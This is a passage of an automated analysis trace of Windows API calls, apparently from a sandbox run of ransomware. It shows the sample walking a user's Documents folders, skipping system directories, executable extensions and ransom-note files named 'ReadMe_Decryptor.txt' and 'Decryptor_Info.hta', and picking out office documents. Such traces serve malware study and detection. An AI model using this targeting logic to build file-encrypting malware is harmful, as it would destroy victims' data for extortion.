(lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Intel") returned 1 [0105.050] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\msys32") returned 1 [0105.050] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Qt") returned 1 [0105.050] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\ProgramData") returned 1 [0105.050] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Program Files") returned 1 [0105.050] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Windows") returned -1 [0105.050] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Program Files (x86)") returned 1 [0105.050] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\" [0105.050] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\") returned 74 [0105.050] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77e610 [0105.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.050] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8c703670, ftCreationTime.dwHighDateTime=0x1d5dc7b, ftLastAccessTime.dwLowDateTime=0xa9ab3ec0, ftLastAccessTime.dwHighDateTime=0x1d5dc34, ftLastWriteTime.dwLowDateTime=0xa9ab3ec0, ftLastWriteTime.dwHighDateTime=0x1d5dc34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.052] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.053] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.053] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2891d40, ftCreationTime.dwHighDateTime=0x1d5e006, ftLastAccessTime.dwLowDateTime=0x93b907a0, ftLastAccessTime.dwHighDateTime=0x1d5dec8, ftLastWriteTime.dwLowDateTime=0x93b907a0, ftLastWriteTime.dwHighDateTime=0x1d5dec8, nFileSizeHigh=0x0, nFileSizeLow=0x86c, dwReserved0=0x0, dwReserved1=0x0, cFileName="aIsUN6kQ Oe.pdf", cAlternateFileName="AISUN6~1.PDF")) returned 1 [0105.053] lstrcmpW (lpString1="aIsUN6kQ Oe.pdf", lpString2=".") returned 1 [0105.053] lstrcmpW (lpString1="aIsUN6kQ Oe.pdf", lpString2="..") returned 1 [0105.053] lstrcmpiW (lpString1="aIsUN6kQ Oe.pdf", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.053] lstrcmpiW (lpString1="aIsUN6kQ Oe.pdf", lpString2="Decryptor_Info.hta") returned -1 [0105.053] PathFindExtensionW (pszPath="aIsUN6kQ Oe.pdf") returned=".pdf" [0105.053] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0105.053] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0105.188] lstrcmpiW (lpString1="T", lpString2=".lnk") returned 1 [0105.188] lstrcmpiW (lpString1="T", lpString2=".dll") returned 1 [0105.188] lstrcmpiW (lpString1="T", lpString2=".msi") returned 1 [0105.188] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7af4d0 [0105.188] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7af578 [0105.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af4d0 | out: hHeap=0x6d0000) returned 1 [0105.189] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa993db0, ftCreationTime.dwHighDateTime=0x1d5dc33, ftLastAccessTime.dwLowDateTime=0x9fa94710, ftLastAccessTime.dwHighDateTime=0x1d5e2a5, ftLastWriteTime.dwLowDateTime=0x9fa94710, ftLastWriteTime.dwHighDateTime=0x1d5e2a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oAemNaE", cAlternateFileName="")) returned 1 [0105.189] lstrcmpW (lpString1="oAemNaE", lpString2=".") returned 1 [0105.189] lstrcmpW (lpString1="oAemNaE", lpString2="..") returned 1 [0105.189] lstrlenW (lpString="oAemNaE") returned 7 [0105.189] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\", lpString2="oAemNaE" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE" [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Windows") returned -1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\ProgramData") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Intel") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\msys32") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Qt") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\ProgramData") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Program Files") returned 1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Windows") returned -1 [0105.189] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="C:\\Program Files (x86)") returned 1 [0105.190] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\" [0105.190] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\") returned 82 [0105.190] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72abb8 [0105.190] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.190] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa993db0, ftCreationTime.dwHighDateTime=0x1d5dc33, ftLastAccessTime.dwLowDateTime=0x9fa94710, ftLastAccessTime.dwHighDateTime=0x1d5e2a5, ftLastWriteTime.dwLowDateTime=0x9fa94710, ftLastWriteTime.dwHighDateTime=0x1d5e2a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.192] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.192] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.192] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70f3b850, ftCreationTime.dwHighDateTime=0x1d5e1f7, ftLastAccessTime.dwLowDateTime=0x9becce10, ftLastAccessTime.dwHighDateTime=0x1d5e644, ftLastWriteTime.dwLowDateTime=0x9becce10, ftLastWriteTime.dwHighDateTime=0x1d5e644, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4egQ3W", cAlternateFileName="")) returned 1 [0105.192] lstrcmpW (lpString1="4egQ3W", lpString2=".") returned 1 [0105.192] lstrcmpW (lpString1="4egQ3W", lpString2="..") returned 1 [0105.192] lstrlenW (lpString="4egQ3W") returned 6 [0105.192] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\", lpString2="4egQ3W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W" [0105.192] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Windows") returned -1 [0105.192] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.192] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.192] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\ProgramData") returned 1 [0105.192] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Intel") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\msys32") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Qt") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\ProgramData") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Program Files") returned 1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Windows") returned -1 [0105.193] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="C:\\Program Files (x86)") returned 1 [0105.193] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\" [0105.193] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\") returned 89 [0105.193] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7af4d0 [0105.194] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.194] FindNextFileW (in: hFindFile=0x7af4d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70f3b850, ftCreationTime.dwHighDateTime=0x1d5e1f7, ftLastAccessTime.dwLowDateTime=0x9becce10, ftLastAccessTime.dwHighDateTime=0x1d5e644, ftLastWriteTime.dwLowDateTime=0x9becce10, ftLastWriteTime.dwHighDateTime=0x1d5e644, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.195] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.195] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.195] FindNextFileW (in: hFindFile=0x7af4d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53eaed10, ftCreationTime.dwHighDateTime=0x1d5e09d, ftLastAccessTime.dwLowDateTime=0xb88e06a0, ftLastAccessTime.dwHighDateTime=0x1d5e7da, ftLastWriteTime.dwLowDateTime=0xb88e06a0, ftLastWriteTime.dwHighDateTime=0x1d5e7da, nFileSizeHigh=0x0, nFileSizeLow=0x168ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="o7_4kYcuMGpVw7fWhX.doc", cAlternateFileName="O7_4KY~1.DOC")) returned 1 [0105.195] lstrcmpW (lpString1="o7_4kYcuMGpVw7fWhX.doc", lpString2=".") returned 1 [0105.195] lstrcmpW (lpString1="o7_4kYcuMGpVw7fWhX.doc", lpString2="..") returned 1 [0105.195] lstrcmpiW (lpString1="o7_4kYcuMGpVw7fWhX.doc", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.195] lstrcmpiW (lpString1="o7_4kYcuMGpVw7fWhX.doc", lpString2="Decryptor_Info.hta") returned 1 [0105.195] PathFindExtensionW (pszPath="o7_4kYcuMGpVw7fWhX.doc") returned=".doc" [0105.195] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0105.195] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0105.196] lstrcmpiW (lpString1=".doc", lpString2=".lnk") returned -1 [0105.196] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0105.196] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0105.196] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7af620 [0105.196] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7af6e8 [0105.196] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.196] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f3b8 [0105.196] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af6e8 | out: hHeap=0x6d0000) returned 1 [0105.196] FindNextFileW (in: hFindFile=0x7af4d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd602a3c0, ftCreationTime.dwHighDateTime=0x1d5e3e9, ftLastAccessTime.dwLowDateTime=0x3e47500, ftLastAccessTime.dwHighDateTime=0x1d5e36a, ftLastWriteTime.dwLowDateTime=0x3e47500, ftLastWriteTime.dwHighDateTime=0x1d5e36a, nFileSizeHigh=0x0, nFileSizeLow=0x345e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QZDgmOZTc7o7iXJAMnXT.odp", cAlternateFileName="QZDGMO~1.ODP")) returned 1 [0105.196] lstrcmpW (lpString1="QZDgmOZTc7o7iXJAMnXT.odp", lpString2=".") returned 1 [0105.196] lstrcmpW (lpString1="QZDgmOZTc7o7iXJAMnXT.odp", lpString2="..") returned 1 [0105.196] lstrcmpiW (lpString1="QZDgmOZTc7o7iXJAMnXT.odp", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.196] lstrcmpiW (lpString1="QZDgmOZTc7o7iXJAMnXT.odp", lpString2="Decryptor_Info.hta") returned 1 [0105.196] PathFindExtensionW (pszPath="QZDgmOZTc7o7iXJAMnXT.odp") returned=".odp" [0105.196] lstrcmpiW (lpString1=".odp", lpString2=".exe") returned 1 [0105.196] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0105.196] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0105.196] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0105.196] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0105.196] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7af620 [0105.196] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7af6e8 [0105.196] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.196] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x7af810 [0105.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af6e8 | out: hHeap=0x6d0000) returned 1 [0105.197] FindNextFileW (in: hFindFile=0x7af4d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb616b0, ftCreationTime.dwHighDateTime=0x1d5d9db, ftLastAccessTime.dwLowDateTime=0xc5746220, ftLastAccessTime.dwHighDateTime=0x1d5e662, ftLastWriteTime.dwLowDateTime=0xc5746220, ftLastWriteTime.dwHighDateTime=0x1d5e662, nFileSizeHigh=0x0, nFileSizeLow=0x187b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="X8dzWrXMsQ50rnRg8ep8.docx", cAlternateFileName="X8DZWR~1.DOC")) returned 1 [0105.197] lstrcmpW (lpString1="X8dzWrXMsQ50rnRg8ep8.docx", lpString2=".") returned 1 [0105.197] lstrcmpW (lpString1="X8dzWrXMsQ50rnRg8ep8.docx", lpString2="..") returned 1 [0105.197] lstrcmpiW (lpString1="X8dzWrXMsQ50rnRg8ep8.docx", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.197] lstrcmpiW (lpString1="X8dzWrXMsQ50rnRg8ep8.docx", lpString2="Decryptor_Info.hta") returned 1 [0105.197] PathFindExtensionW (pszPath="X8dzWrXMsQ50rnRg8ep8.docx") returned=".docx" [0105.197] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.197] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.197] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.197] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.197] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7af620 [0105.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7af6e8 [0105.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af620 | out: hHeap=0x6d0000) returned 1 [0105.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x7af908 [0105.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af6e8 | out: hHeap=0x6d0000) returned 1 [0105.197] FindNextFileW (in: hFindFile=0x7af4d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb616b0, ftCreationTime.dwHighDateTime=0x1d5d9db, ftLastAccessTime.dwLowDateTime=0xc5746220, ftLastAccessTime.dwHighDateTime=0x1d5e662, ftLastWriteTime.dwLowDateTime=0xc5746220, ftLastWriteTime.dwHighDateTime=0x1d5e662, nFileSizeHigh=0x0, nFileSizeLow=0x187b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="X8dzWrXMsQ50rnRg8ep8.docx", cAlternateFileName="X8DZWR~1.DOC")) returned 0 [0105.197] FindClose (in: hFindFile=0x7af4d0 | out: hFindFile=0x7af4d0) returned 1 [0105.198] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9db47610, 